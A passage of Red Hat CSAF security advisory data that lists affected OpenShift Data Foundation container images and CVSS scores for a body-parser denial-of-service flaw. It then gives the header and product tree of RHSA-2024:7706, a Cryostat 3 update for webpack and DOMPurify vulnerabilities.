"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024:7706
Vulnerability from csaf_redhat
Published
2024-10-07 01:12
Modified
2025-04-09 21:05
Summary
Red Hat Security Advisory: Red Hat build of Cryostat security update
Notes
Topic
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Security Fix(es):
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nSecurity Fix(es):\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7706", url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7706.json", }, ], title: "Red Hat Security Advisory: Red Hat build of Cryostat security update", tracking: { current_release_date: "2025-04-09T21:05:42+00:00", generator: { date: "2025-04-09T21:05:42+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7706", initial_release_date: "2024-10-07T01:12:29+00:00", revision_history: [ { date: "2024-10-07T01:12:29+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T01:12:29+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-09T21:05:42+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Cryostat 3 on RHEL 8", product: { name: "Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3", product_identification_helper: { cpe: "cpe:/a:redhat:cryostat:3::el8", }, }, }, ], category: "product_family", name: "Cryostat", }, { branches: [ { category: "product_version", name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product_id: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product_id: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product_identification_helper: { purl: 